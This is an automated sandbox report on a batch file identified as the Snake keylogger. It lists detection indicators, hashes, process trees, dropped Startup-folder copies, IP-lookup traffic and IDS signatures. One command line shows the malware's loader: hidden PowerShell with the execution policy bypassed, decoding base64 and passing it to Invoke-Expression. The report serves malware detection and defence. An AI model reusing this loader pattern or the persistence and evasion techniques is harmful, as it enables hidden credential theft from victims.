File name: NewOrder.bat

Full analysis: https://app.any.run/tasks/4ed3d55b-5913-4c13-bbd1-c8039de15e47
Verdict: Malicious activity
Threats:

A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools.

Analysis date: June 02, 2025, 08:40:47
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags: evasion, auto-startup, snake, keylogger, stealer, susp-powershell
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (61642), with CRLF line terminators
MD5: 5A6A70372CA061E1758F52DD37ED8ACC
SHA1: 8AEABAAF957620FD535B0253A6BCC06BF3C08E0F
SHA256: B853E5EC8704AE420723E2C297D895888ECDD835204969F64779FD78A953BECA
SSDEEP: 3072:16S37Z221z/XLIZz17Hj4B+BpcYmTFVfz/4U1:1ZtdrXYLj4BQcYmTFV8U

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 1052)
      • cmd.exe (PID: 4560)
      • cmd.exe (PID: 4728)
      • cmd.exe (PID: 6208)
      • cmd.exe (PID: 7880)
      • cmd.exe (PID: 8012)
      • cmd.exe (PID: 7520)
      • cmd.exe (PID: 6368)
      • cmd.exe (PID: 7280)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)
      • powershell.exe (PID: 7224)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)
      • powershell.exe (PID: 7224)
    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)
    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)
    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)
    • Create files in the Startup directory

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)
      • powershell.exe (PID: 7224)
    • SNAKEKEYLOGGER has been detected (SURICATA)

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)
      • powershell.exe (PID: 7224)
    • Steals credentials from Web Browsers

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)
    • Actions look like stealing of personal data

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)
    • SNAKE has been detected (YARA)

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 7148)
      • cmd.exe (PID: 6920)
      • cmd.exe (PID: 7184)
      • cmd.exe (PID: 7232)
      • cmd.exe (PID: 7272)
      • cmd.exe (PID: 7312)
      • cmd.exe (PID: 2088)
      • cmd.exe (PID: 736)
      • cmd.exe (PID: 7276)
    • Application launched itself

      • cmd.exe (PID: 7148)
      • cmd.exe (PID: 6920)
      • cmd.exe (PID: 7184)
      • cmd.exe (PID: 7232)
      • cmd.exe (PID: 7272)
      • cmd.exe (PID: 7312)
      • cmd.exe (PID: 2088)
      • cmd.exe (PID: 736)
      • cmd.exe (PID: 7276)
    • Executing commands from a ".bat" file

      • cmd.exe (PID: 7148)
      • cmd.exe (PID: 6920)
      • cmd.exe (PID: 7184)
      • cmd.exe (PID: 7232)
      • cmd.exe (PID: 7272)
      • cmd.exe (PID: 7312)
      • cmd.exe (PID: 2088)
      • cmd.exe (PID: 736)
      • cmd.exe (PID: 7276)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1052)
      • cmd.exe (PID: 4560)
      • cmd.exe (PID: 4728)
      • cmd.exe (PID: 6208)
      • cmd.exe (PID: 7880)
      • cmd.exe (PID: 8012)
      • cmd.exe (PID: 7520)
      • cmd.exe (PID: 6368)
      • cmd.exe (PID: 7280)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 1052)
      • cmd.exe (PID: 4560)
      • cmd.exe (PID: 4728)
      • cmd.exe (PID: 6208)
      • cmd.exe (PID: 7880)
      • cmd.exe (PID: 8012)
      • cmd.exe (PID: 7520)
      • cmd.exe (PID: 6368)
      • cmd.exe (PID: 7280)
    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 1052)
      • cmd.exe (PID: 4560)
      • cmd.exe (PID: 4728)
      • cmd.exe (PID: 6208)
      • cmd.exe (PID: 7880)
      • cmd.exe (PID: 8012)
      • cmd.exe (PID: 7520)
      • cmd.exe (PID: 6368)
      • cmd.exe (PID: 7280)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)
    • Checks for external IP

      • svchost.exe (PID: 2196)
      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)
      • powershell.exe (PID: 7224)
    • The process verifies whether the antivirus software is installed

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 5980)
      • powershell.exe (PID: 2660)
    • Connects to FTP

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 7224)
      • powershell.exe (PID: 5980)
  • INFO

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)
    • Launch of the file from Startup directory

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)
    • Disables trace logs

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)
    • Manual execution by a user

      • cmd.exe (PID: 6920)
      • cmd.exe (PID: 7184)
      • cmd.exe (PID: 7232)
      • cmd.exe (PID: 7272)
      • cmd.exe (PID: 7312)
      • cmd.exe (PID: 2088)
      • cmd.exe (PID: 736)
      • cmd.exe (PID: 7276)
    • Checks proxy server information

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)
    • Found Base64 encoded access to Marshal class via PowerShell (YARA)

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 166
Monitored processes: 47
Malicious processes: 27
Suspicious processes: 0

Behavior graph

(Rendered as an interactive process tree in the full report.) Starting from the root, the tree shows nine chains of cmd.exe → conhost.exe → cmd.exe → conhost.exe → powershell.exe, with each chain's powershell.exe node tagged #SNAKEKEYLOGGER (one of them tagged #SNAKE); svchost.exe and slui.exe also appear in the tree.

Process information

PID: 736
CMD: C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\074b.bat""
Path: C:\Windows\System32\cmd.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 1052
CMD: C:\WINDOWS\system32\cmd.exe /K "C:\Users\admin\Desktop\NewOrder.bat"
Path: C:\Windows\System32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 1056
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1472
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1512
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1676
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2088
CMD: C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\15ba.bat""
Path: C:\Windows\System32\cmd.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 2196
CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Host Process for Windows Services
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
PID: 2660
CMD: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression"
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
PID: 2800
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 52 126
Read events: 52 112
Write events: 14
Delete events: 0

Modification events

PID 2980 powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | EnableFileTracing = 0
PID 2980 powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | EnableAutoFileTracing = 0
PID 2980 powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | EnableConsoleTracing = 0
PID 2980 powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | FileTracingMask = (value not shown in report)
PID 2980 powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | ConsoleTracingMask = (value not shown in report)
PID 2980 powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | MaxFileSize = 1048576
PID 2980 powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | FileDirectory = %windir%\tracing
PID 2980 powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS | EnableFileTracing = 0
PID 2980 powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS | EnableAutoFileTracing = 0
PID 2980 powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS | EnableConsoleTracing = 0
Executable files: 0
Suspicious files: 1
Text files: 28
Unknown types: 0

Dropped files

PID 1052 cmd.exe | C:\Users\admin\dwm.bat | text
  MD5: 5A6A70372CA061E1758F52DD37ED8ACC
  SHA256: B853E5EC8704AE420723E2C297D895888ECDD835204969F64779FD78A953BECA
PID 2980 powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_k4gmuscd.ohi.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 2980 powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5e1f.bat | text
  MD5: 5A6A70372CA061E1758F52DD37ED8ACC
  SHA256: B853E5EC8704AE420723E2C297D895888ECDD835204969F64779FD78A953BECA
PID 5176 powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qd2otyv2.zql.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 2980 powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wm5avnip.w5k.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 5176 powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pa33khaj.akc.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 8056 powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5566.bat | text
  MD5: 5A6A70372CA061E1758F52DD37ED8ACC
  SHA256: B853E5EC8704AE420723E2C297D895888ECDD835204969F64779FD78A953BECA
PID 8056 powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2plkt2q1.lih.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 8056 powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_01h3axeq.lra.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 8088 powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xkfysoei.gnw.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 157
TCP/UDP connections: 46
DNS requests: 7
Threats: 102

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
1088 | RUXIMICS.exe | GET | 200 | 23.219.150.101:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | - | - | whitelisted
1088 | RUXIMICS.exe | GET | 200 | 2.20.245.139:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | - | - | whitelisted
- | - | GET | 200 | 104.21.48.1:443 | https://reallyfreegeoip.org/xml/37.182.178.175 | unknown | text | 344 b | malicious
2980 | powershell.exe | GET | 200 | 132.226.247.73:80 | http://checkip.dyndns.org/ | unknown | - | - | whitelisted
- | - | GET | 200 | 104.21.48.1:443 | https://reallyfreegeoip.org/xml/37.182.178.175 | unknown | - | - | -
2980 | powershell.exe | GET | 200 | 132.226.247.73:80 | http://checkip.dyndns.org/ | unknown | - | - | whitelisted
- | - | GET | 200 | 104.21.16.1:443 | https://reallyfreegeoip.org/xml/37.182.178.175 | unknown | - | - | -
- | - | GET | 200 | 104.21.32.1:443 | https://reallyfreegeoip.org/xml/37.182.178.175 | unknown | - | - | -
2980 | powershell.exe | GET | 200 | 132.226.247.73:80 | http://checkip.dyndns.org/ | unknown | - | - | whitelisted
2980 | powershell.exe | GET | 200 | 132.226.247.73:80 | http://checkip.dyndns.org/ | unknown | - | - | whitelisted
("-" marks a cell left empty in the report.)

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
- | - | 40.127.240.158:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
1088 | RUXIMICS.exe | 40.127.240.158:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
1088 | RUXIMICS.exe | 2.20.245.139:80 | crl.microsoft.com | Akamai International B.V. | SE | whitelisted
1088 | RUXIMICS.exe | 23.219.150.101:80 | www.microsoft.com | AKAMAI-AS | CL | whitelisted
2980 | powershell.exe | 132.226.247.73:80 | checkip.dyndns.org | ORACLE-BMC-31898 | BR | whitelisted
2980 | powershell.exe | 104.21.96.1:443 | reallyfreegeoip.org | CLOUDFLARENET | - | malicious
5176 | powershell.exe | 132.226.247.73:80 | checkip.dyndns.org | ORACLE-BMC-31898 | BR | whitelisted
5176 | powershell.exe | 104.21.96.1:443 | reallyfreegeoip.org | CLOUDFLARENET | - | malicious
("-" marks a cell left empty in the report.)

DNS requests

Domain | IP(s) | Reputation
google.com | 142.250.74.206 | whitelisted
crl.microsoft.com | 2.20.245.139, 2.20.245.137 | whitelisted
www.microsoft.com | 23.219.150.101 | whitelisted
checkip.dyndns.org | 132.226.247.73, 193.122.130.0, 193.122.6.168, 158.101.44.242, 132.226.8.169 | whitelisted
reallyfreegeoip.org | 104.21.96.1, 104.21.112.1, 104.21.16.1, 104.21.80.1, 104.21.64.1, 104.21.32.1, 104.21.48.1 | malicious
activation-v2.sls.microsoft.com | 20.83.72.98 | whitelisted
self.events.data.microsoft.com | 20.42.72.131 | whitelisted

Threats

Class | Message
Device Retrieving External IP Address Detected | ET DYN_DNS External IP Lookup Domain in DNS Query (checkip .dyndns .org)
Device Retrieving External IP Address Detected | ET INFO External IP Lookup - checkip.dyndns.org
Device Retrieving External IP Address Detected | ET INFO 404/Snake/Matiex Keylogger Style External IP Check
Device Retrieving External IP Address Detected | INFO [ANY.RUN] External IP Address Lookup Domain (reallyfreegeoip .org)
Device Retrieving External IP Address Detected | ET INFO External IP Lookup - checkip.dyndns.org
Misc activity | ET INFO External IP Address Lookup Domain in DNS Lookup (reallyfreegeoip .org)
Misc activity | ET INFO External IP Lookup Service Domain (reallyfreegeoip .org) in TLS SNI
Device Retrieving External IP Address Detected | ET INFO External IP Lookup - checkip.dyndns.org
Device Retrieving External IP Address Detected | ET INFO External IP Lookup - checkip.dyndns.org
Device Retrieving External IP Address Detected | ET INFO External IP Lookup - checkip.dyndns.org
(The PID and Process columns are empty for every row in the report.)
No debug info